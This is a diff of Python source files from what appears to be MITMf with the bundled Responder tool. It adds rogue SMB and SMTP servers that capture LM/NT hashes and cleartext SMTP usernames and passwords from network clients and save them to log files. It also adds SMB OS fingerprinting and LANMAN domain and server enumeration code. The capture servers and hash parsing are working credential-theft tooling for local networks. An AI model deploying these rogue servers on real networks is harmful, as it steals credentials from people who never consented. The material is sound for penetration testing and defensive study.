+					head = SMBHeader(cmd="\x25",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					final = "\x00\x00\x00"
+					packet1 = str(head)+str(final)
+					buffer1 = longueur(packet1)+packet1
+					self.request.send(buffer1)
+					data = self.request.recv(1024)
+				##LogOff.
+				if data[8:10] == "\x74\x00":
+					head = SMBHeader(cmd="\x74",flag1="\x98", flag2="\x07\xc8", errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					final = "\x02\xff\x00\x27\x00\x00\x00"
+					packet1 = str(head)+str(final)
+					buffer1 = longueur(packet1)+packet1
+					self.request.send(buffer1)
+					data = self.request.recv(1024)
+
+		except Exception:
+			pass #no need to print errors..
+
+#SMB Server class, old version.
+class SMB1LM(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			self.request.settimeout(0.5)
+			data = self.request.recv(1024)
+			##session request 139
+			if data[0] == "\x81":
+				buffer0 = "\x82\x00\x00\x00"
+				self.request.send(buffer0)
+				data = self.request.recv(1024)
+				##Negotiate proto answer.
+			if data[8:10] == "\x72\x00":
+				head = SMBHeader(cmd="\x72",flag1="\x80", flag2="\x00\x00",pid=pidcalc(data),mid=midcalc(data))
+				t = SMBNegoAnsLM(Dialect=Parse_Nego_Dialect(data),Domain="",Key=Challenge)
+				t.calculate()
+				packet1 = str(head)+str(t)
+				buffer1 = longueur(packet1)+packet1
+				self.request.send(buffer1)
+				data = self.request.recv(1024)
+				##Session Setup AndX Request
+			if data[8:10] == "\x73\x00":
+				if Is_LMNT_Anonymous(data):
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x72\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					packet1 = str(head)+str(SMBSessEmpty())
+					buffer1 = longueur(packet1)+packet1
+					self.request.send(buffer1)
+				else:
+					ParseLMNTHash(data,self.client_address[0])
+					head = SMBHeader(cmd="\x73",flag1="\x90", flag2="\x53\xc8",errorcode="\x22\x00\x00\xc0",pid=pidcalc(data),tid=tidcalc(data),uid=uidcalc(data),mid=midcalc(data))
+					packet1 = str(head)+str(SMBSessEmpty())
+					buffer1 = longueur(packet1)+packet1
+					self.request.send(buffer1)
+					data = self.request.recv(1024)
+
+		except Exception:
+			self.request.close()
+			pass
+
+##################################################################################
+#SMB Server stuff ends here
+##################################################################################

core/protocols/smb/SMBserver.py

@@ -0,0 +1,28 @@
+import logging
+import threading
+import sys
+from impacket import smbserver, LOG
+
+LOG.setLevel(logging.INFO)
+LOG.propagate = False
+#logging.getLogger('smbserver').setLevel(logging.INFO)
+#logging.getLogger('impacket').setLevel(logging.INFO)
+
+formatter = logging.Formatter("%(asctime)s [SMBserver] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
+fileHandler = logging.FileHandler("./logs/mitmf.log")
+streamHandler = logging.StreamHandler(sys.stdout)
+fileHandler.setFormatter(formatter)
+streamHandler.setFormatter(formatter)
+LOG.addHandler(fileHandler)
+LOG.addHandler(streamHandler)
+
+class SMBserver:
+
+    def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''):
+
+        self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile)
+
+    def start(self):
+        t = threading.Thread(name='SMBserver', target=self.server.start)
+        t.setDaemon(True)
+        t.start()

core/protocols/smtp/SMTPPackets.py

@@ -0,0 +1,74 @@
+#! /usr/bin/env python
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import struct
+from odict import OrderedDict
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+#SMTP Greating class
+class SMTPGreating(Packet):
+    fields = OrderedDict([
+        ("Code",             "220"),
+        ("Separator",        "\x20"), 
+        ("Message",          "smtp01.local ESMTP"),
+        ("CRLF",             "\x0d\x0a"),
+        ]) 
+
+class SMTPAUTH(Packet):
+    fields = OrderedDict([
+        ("Code0",            "250"),
+        ("Separator0",       "\x2d"), 
+        ("Message0",         "smtp01.local"),
+        ("CRLF0",            "\x0d\x0a"),
+        ("Code",             "250"),
+        ("Separator",        "\x20"), 
+        ("Message",          "AUTH LOGIN PLAIN XYMCOOKIE"),
+        ("CRLF",             "\x0d\x0a"),
+        ]) 
+
+class SMTPAUTH1(Packet):
+    fields = OrderedDict([
+        ("Code",             "334"),
+        ("Separator",        "\x20"), 
+        ("Message",          "VXNlcm5hbWU6"),#Username
+        ("CRLF",             "\x0d\x0a"),
+
+        ]) 
+
+class SMTPAUTH2(Packet):
+    fields = OrderedDict([
+        ("Code",             "334"),
+        ("Separator",        "\x20"), 
+        ("Message",          "UGFzc3dvcmQ6"),#Password
+        ("CRLF",             "\x0d\x0a"),
+
+        ]) 
+
+

core/protocols/smtp/SMTPServer.py

@@ -0,0 +1,63 @@
+##################################################################################
+#ESMTP Stuff starts here
+##################################################################################
+
+class SMTP():
+
+	def serve_thread_tcp(self, host, port, handler):
+		try:
+			server = ThreadingTCPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	#Function name self-explanatory
+	def start(self, SMTP_On_Off):
+		if SMTP_On_Off == "ON":
+			t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=("0.0.0.0", 25,ESMTP))
+			t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=("0.0.0.0", 587,ESMTP))
+			
+			for t in [t1, t2]:
+				t.setDaemon(True)
+				t.start()
+
+		if SMTP_On_Off == "OFF":
+			return False
+
+class ThreadingTCPServer(ThreadingMixIn, TCPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		TCPServer.server_bind(self)
+
+#ESMTP server class.
+class ESMTP(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			self.request.send(str(SMTPGreating()))
+			data = self.request.recv(1024)
+			if data[0:4] == "EHLO":
+				self.request.send(str(SMTPAUTH()))
+				data = self.request.recv(1024)
+			if data[0:4] == "AUTH":
+				self.request.send(str(SMTPAUTH1()))
+				data = self.request.recv(1024)
+				if data:
+					Username = b64decode(data[:len(data)-2])
+					self.request.send(str(SMTPAUTH2()))
+					data = self.request.recv(1024)
+					if data:
+						Password = b64decode(data[:len(data)-2])
+						Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt"
+						WriteData(Outfile,Username+":"+Password, Username+":"+Password)
+						#print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)
+						responder_logger.info("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password))
+
+		except Exception:
+			pass
+
+##################################################################################
+#ESMTP Stuff ends here
+##################################################################################

core/responder/common.py

@@ -0,0 +1,102 @@
+#common functions that are used throughout the Responder's code
+
+
+import re
+
+#Function used to write captured hashs to a file.
+def WriteData(outfile, data, user):
+	if os.path.isfile(outfile) == False:
+		with open(outfile,"w") as outf:
+			outf.write(data)
+			outf.write("\n")
+			outf.close()
+	if os.path.isfile(outfile) == True:
+		with open(outfile,"r") as filestr:
+			if re.search(user.encode('hex'), filestr.read().encode('hex')):
+				filestr.close()
+				return False
+			if re.search(re.escape("$"), user):
+				filestr.close()
+				return False
+			else:
+				with open(outfile,"a") as outf2:
+					outf2.write(data)
+					outf2.write("\n")
+					outf2.close()
+
+def Parse_IPV6_Addr(data):
+	if data[len(data)-4:len(data)][1] =="\x1c":
+		return False
+	if data[len(data)-4:len(data)] == "\x00\x01\x00\x01":
+		return True
+	if data[len(data)-4:len(data)] == "\x00\xff\x00\x01":
+		return True
+	else:
+		return False
+
+#Function name self-explanatory
+def Is_Finger_On(Finger_On_Off):
+	if Finger_On_Off == True:
+		return True
+	if Finger_On_Off == False:
+		return False
+
+def RespondToSpecificHost(RespondTo):
+	if len(RespondTo)>=1 and RespondTo != ['']:
+		return True
+	else:
+		return False
+
+def RespondToSpecificName(RespondToName):
+	if len(RespondToName)>=1 and RespondToName != ['']:
+		return True
+	else:
+		return False
+
+def RespondToIPScope(RespondTo, ClientIp):
+	if ClientIp in RespondTo:
+		return True
+	else:
+		return False
+
+def RespondToNameScope(RespondToName, Name):
+	if Name in RespondToName:
+		return True
+	else:
+		return False
+
+##Dont Respond to these hosts/names.
+def DontRespondToSpecificHost(DontRespondTo):
+	if len(DontRespondTo)>=1 and DontRespondTo != ['']:
+		return True
+	else:
+		return False
+
+def DontRespondToSpecificName(DontRespondToName):
+	if len(DontRespondToName)>=1 and DontRespondToName != ['']:
+		return True
+	else:
+		return False
+
+def DontRespondToIPScope(DontRespondTo, ClientIp):
+	if ClientIp in DontRespondTo:
+		return True
+	else:
+		return False
+
+def DontRespondToNameScope(DontRespondToName, Name):
+	if Name in DontRespondToName:
+		return True
+	else:
+		return False
+
+def IsOnTheSameSubnet(ip, net):
+	net = net+'/24'
+	ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
+	netstr, bits = net.split('/')
+	netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
+	mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
+	return (ipaddr & mask) == (netaddr & mask)
+
+def FindLocalIP(Iface):
+	return OURIP

core/responder/fingerprinter/Fingerprint.py

@@ -0,0 +1,121 @@
+#! /usr/bin/env python
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import re,sys,socket,struct,string
+from socket import *
+from ..odict import OrderedDict
+from ..packet import Packet
+
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1", "\x00"),
+        ("flag2", "\x00\x00"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\x00\x00"),
+        ("uid", "\x00\x00"),
+        ("mid", "\x00\x00"),
+    ])
+
+class SMBNego(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x00"),
+        ("bcc", "\x62\x00"),
+        ("data", "")
+    ])
+    
+    def calculate(self):
+        self.fields["bcc"] = struct.pack("<h",len(str(self.fields["data"])))
+
+class SMBNegoData(Packet):
+    fields = OrderedDict([
+        ("separator1","\x02" ),
+        ("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
+        ("separator2","\x02"),
+        ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
+        ("separator3","\x02"),
+        ("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
+        ("separator4","\x02"),
+        ("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
+        ("separator5","\x02"),
+        ("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
+        ("separator6","\x02"),
+        ("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
+    ])
+
+class SMBSessionFingerData(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x0c"),
+        ("AndXCommand", "\xff"),
+        ("reserved","\x00" ),
+        ("andxoffset", "\x00\x00"),
+        ("maxbuff","\x04\x11"),
+        ("maxmpx", "\x32\x00"),
+        ("vcnum","\x00\x00"),
+        ("sessionkey", "\x00\x00\x00\x00"),
+        ("securitybloblength","\x4a\x00"),
+        ("reserved2","\x00\x00\x00\x00"),
+        ("capabilities", "\xd4\x00\x00\xa0"),
+        ("bcc1",""),
+        ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
+
+    ])
+    def calculate(self): 
+        self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]   
+
+
+def OsNameClientVersion(data):
+    try:
+       lenght = struct.unpack('<H',data[43:45])[0]
+       pack = tuple(data[47+lenght:].split('\x00\x00\x00'))[:2]
+       var = [e.replace('\x00','') for e in data[47+lenght:].split('\x00\x00\x00')[:2]]
+       OsVersion, ClientVersion = tuple(var)
+       return OsVersion, ClientVersion
+    except:
+       return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
+
+def RunSmbFinger(host):
+    s = socket(AF_INET, SOCK_STREAM)
+    s.connect(host)
+    s.settimeout(0.7)
+    h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
+    n = SMBNego(data = SMBNegoData())
+    n.calculate()
+    packet0 = str(h)+str(n)
+    buffer0 = longueur(packet0)+packet0
+    s.send(buffer0)
+    data = s.recv(2048)
+    if data[8:10] == "\x72\x00":
+       head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
+       t = SMBSessionFingerData()
+       t.calculate()
+       final = t 
+       packet0 = str(head)+str(final)
+       buffer1 = longueur(packet0)+packet0  
+       s.send(buffer1) 
+       data = s.recv(2048)
+    if data[8:10] == "\x73\x16":
+       return OsNameClientVersion(data)

core/responder/fingerprinter/FingerprintRelay.py

@@ -0,0 +1,132 @@
+#! /usr/bin/env python
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+import re,socket,struct
+from socket import *
+from odict import OrderedDict
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1", "\x00"),
+        ("flag2", "\x00\x00"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\x00\x00"),
+        ("uid", "\x00\x00"),
+        ("mid", "\x00\x00"),
+    ])
+
+class SMBNego(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x00"),
+        ("bcc", "\x62\x00"),
+        ("data", "")
+    ])
+    
+    def calculate(self):
+        self.fields["bcc"] = struct.pack("<h",len(str(self.fields["data"])))
+
+class SMBNegoData(Packet):
+    fields = OrderedDict([
+        ("separator1","\x02" ),
+        ("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
+        ("separator2","\x02"),
+        ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
+        ("separator3","\x02"),
+        ("dialect3", "\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61\x00"),
+        ("separator4","\x02"),
+        ("dialect4", "\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00"),
+        ("separator5","\x02"),
+        ("dialect5", "\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00"),
+        ("separator6","\x02"),
+        ("dialect6", "\x4e\x54\x20\x4c\x4d\x20\x30\x2e\x31\x32\x00"),
+    ])
+
+class SMBSessionFingerData(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x0c"),
+        ("AndXCommand", "\xff"),
+        ("reserved","\x00" ),
+        ("andxoffset", "\x00\x00"),
+        ("maxbuff","\x04\x11"),
+        ("maxmpx", "\x32\x00"),
+        ("vcnum","\x00\x00"),
+        ("sessionkey", "\x00\x00\x00\x00"),
+        ("securitybloblength","\x4a\x00"),
+        ("reserved2","\x00\x00\x00\x00"),
+        ("capabilities", "\xd4\x00\x00\xa0"),
+        ("bcc1",""),
+        ("Data","\x60\x48\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"),
+
+    ])
+    def calculate(self): 
+        self.fields["bcc1"] = struct.pack("<i", len(str(self.fields["Data"])))[:2]   
+
+
+def OsNameClientVersion(data):
+    lenght = struct.unpack('<H',data[43:45])[0]
+    pack = tuple(data[47+lenght:].split('\x00\x00\x00'))[:2]
+    var = [e.replace('\x00','') for e in data[47+lenght:].split('\x00\x00\x00')[:2]]
+    OsVersion = tuple(var)[0]
+    return OsVersion
+
+
+def RunSmbFinger(host):
+    s = socket(AF_INET, SOCK_STREAM)
+    s.connect(host)
+    s.settimeout(0.7)
+    h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
+    n = SMBNego(data = SMBNegoData())
+    n.calculate()
+    packet0 = str(h)+str(n)
+    buffer0 = longueur(packet0)+packet0
+    s.send(buffer0)
+    data = s.recv(2048)
+    if data[8:10] == "\x72\x00":
+       head = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
+       t = SMBSessionFingerData()
+       t.calculate()
+       final = t 
+       packet0 = str(head)+str(final)
+       buffer1 = longueur(packet0)+packet0  
+       s.send(buffer1) 
+       data = s.recv(2048)
+    if data[8:10] == "\x73\x16":
+       return OsNameClientVersion(data)

core/responder/fingerprinter/LANFingerprinter.py

@@ -0,0 +1,183 @@
+##################################################################################
+#Browser Listener and Lanman Finger
+##################################################################################
+
+class LANFinger():
+
+	def serve_thread_udp(host, port, handler):
+		try:
+			server = ThreadingUDPServer((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting UDP server on port %s: %s:" % (str(port),str(e))
+
+	def start():
+		t1 = threading.Thread(name="Browser", target=serve_thread_udp, args=("0.0.0.0", 138, Browser))
+
+class ThreadingUDPServer(ThreadingMixIn, UDPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		UDPServer.server_bind(self)
+
+def WorkstationFingerPrint(data):
+	Role = {
+		"\x04\x00"    :"Windows 95",
+		"\x04\x10"    :"Windows 98",
+		"\x04\x90"    :"Windows ME",
+		"\x05\x00"    :"Windows 2000",
+		"\x05\x00"    :"Windows XP",
+		"\x05\x02"    :"Windows 2003",
+		"\x06\x00"    :"Windows Vista/Server 2008",
+		"\x06\x01"    :"Windows 7/Server 2008R2",
+	}
+
+	if data in Role:
+		return Role[data]
+	else:
+		return False
+
+def PrintServerName(data, entries):
+	if entries == 0:
+		pass
+	else:
+		entrieslen = 26*entries
+		chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
+		ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size) ]
+		l =[]
+		for x in ServerName:
+			if WorkstationFingerPrint(x[16:18]):
+				l.append(x[:16].replace('\x00', '')+'\n       [-]Os version is:%s'%(WorkstationFingerPrint(x[16:18])))
+			else:
+				l.append(x[:16].replace('\x00', ''))
+
+		return l
+
+def ParsePacket(Payload):
+	PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
+	StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
+	if StatusCode == "\x00\x00":
+		EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
+		ParsedNames = PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
+		return ParsedNames
+	else:
+		return None
+
+def RAPThisDomain(Client,Domain):
+	try:
+		l =[]
+		for x in range(1):
+			PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
+			if PDC is not None:
+				l.append('[Analyze mode LANMAN]:')
+				l.append('[!]Domain detected on this network:')
+				for x in PDC:
+					l.append('   -'+x)
+			SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
+			if SQL is not None:
+				l.append('[!]SQL Server detected on Domain %s:'%(Domain))
+				for x in SQL:
+					l.append('   -'+x)
+			WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
+			if WKST is not None:
+				l.append('[!]Workstations/Servers detected on Domain %s:'%(Domain))
+				for x in WKST:
+					l.append('   -'+x)
+			else:
+				pass
+			return '\n'.join(l)
+	except:
+		pass
+
+def RapFinger(Host,Domain, Type):
+	try:
+		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+		s.connect((Host,445))
+		s.settimeout(0.3)
+		h = SMBHeader(cmd="\x72",mid="\x01\x00")
+		n = SMBNegoData()
+		n.calculate()
+		packet0 = str(h)+str(n)
+		buffer0 = longueur(packet0)+packet0
+		s.send(buffer0)
+		data = s.recv(1024)
+		##Session Setup AndX Request, Anonymous.
+		if data[8:10] == "\x72\x00":
+			head = SMBHeader(cmd="\x73",mid="\x02\x00")
+			t = SMBSessionData()
+			t.calculate()
+			final = t
+			packet1 = str(head)+str(t)
+			buffer1 = longueur(packet1)+packet1
+			s.send(buffer1)
+			data = s.recv(1024)
+			##Tree Connect IPC$.
+			if data[8:10] == "\x73\x00":
+				head = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
+				t = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
+				t.calculate()
+				packet1 = str(head)+str(t)
+				buffer1 = longueur(packet1)+packet1
+				s.send(buffer1)
+				data = s.recv(1024)
+				##Rap ServerEnum.
+				if data[8:10] == "\x75\x00":
+					head = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
+					t = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
+					t.calculate()
+					packet1 = str(head)+str(t)
+					buffer1 = longueur(packet1)+packet1
+					s.send(buffer1)
+					data = s.recv(64736)
+					##Rap ServerEnum, Get answer and return what we're looking for.
+					if data[8:10] == "\x25\x00":
+						s.close()
+						return ParsePacket(data)
+	except:
+		return None
+
+def BecomeBackup(data,Client):
+	try:
+		DataOffset = struct.unpack('<H',data[139:141])[0]
+		BrowserPacket = data[82+DataOffset:]
+		if BrowserPacket[0] == "\x0b":
+			ServerName = BrowserPacket[1:]
+			Domain = Decode_Name(data[49:81])
+			Name = Decode_Name(data[15:47])
+			Role = NBT_NS_Role(data[45:48])
+			Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain)
+			if AnalyzeMode:
+				Message1=RAPThisDomain(Client,Domain)
+				logger3.warning(Message1)
+			logger3.warning(Message)
+	except:
+		pass
+
+
+	try:
+		Domain = Decode_Name(data[49:81])
+		Name = Decode_Name(data[15:47])
+		Role1 = NBT_NS_Role(data[45:48])
+		Role2 = NBT_NS_Role(data[79:82])
+		Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Name, Role1, Domain, Role2)
+		if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.":
+			if AnalyzeMode:
+				Message1=RAPThisDomain(Client,Domain)
+
+				logger3.warning(Message1)
+			logger3.warning(Message)
+	except:
+		pass
+
+class Browser(BaseRequestHandler):
+
+	def handle(self):
+		try:
+			request, socket = self.request
+			if AnalyzeMode:
+				ParseDatagramNBTNames(request,self.client_address[0])
+				BecomeBackup(request,self.client_address[0])
+			BecomeBackup(request,self.client_address[0])
+		except Exception:
+			pass

core/responder/fingerprinter/RAPLANMANPackets.py

@@ -0,0 +1,160 @@
+import struct
+from odict import OrderedDict
+
+def longueur(payload):
+    length = struct.pack(">i", len(''.join(payload)))
+    return length
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))
+
+
+class SMBHeader(Packet):
+    fields = OrderedDict([
+        ("proto", "\xff\x53\x4d\x42"),
+        ("cmd", "\x72"),
+        ("error-code", "\x00\x00\x00\x00" ),
+        ("flag1", "\x08"),
+        ("flag2", "\x01\x00"),
+        ("pidhigh", "\x00\x00"),
+        ("signature", "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("reserved", "\x00\x00"),
+        ("tid", "\x00\x00"),
+        ("pid", "\x3c\x1b"),
+        ("uid", "\x00\x00"),
+        ("mid", "\x00\x00"),
+    ])
+
+class SMBNegoData(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x00"),
+        ("bcc", "\x54\x00"),
+        ("separator1","\x02" ),
+        ("dialect1", "\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00"),
+        ("separator2","\x02"),
+        ("dialect2", "\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"),
+    ])
+    def calculate(self):
+        CalculateBCC = str(self.fields["separator1"])+str(self.fields["dialect1"])+str(self.fields["separator2"])+str(self.fields["dialect2"])
+        self.fields["bcc"] = struct.pack("<h",len(CalculateBCC))
+
+class SMBSessionData(Packet):
+    fields = OrderedDict([
+        ("wordcount", "\x0a"),
+        ("AndXCommand", "\xff"),
+        ("reserved","\x00"),
+        ("andxoffset", "\x00\x00"),
+        ("maxbuff","\xff\xff"),
+        ("maxmpx", "\x02\x00"),
+        ("vcnum","\x01\x00"),
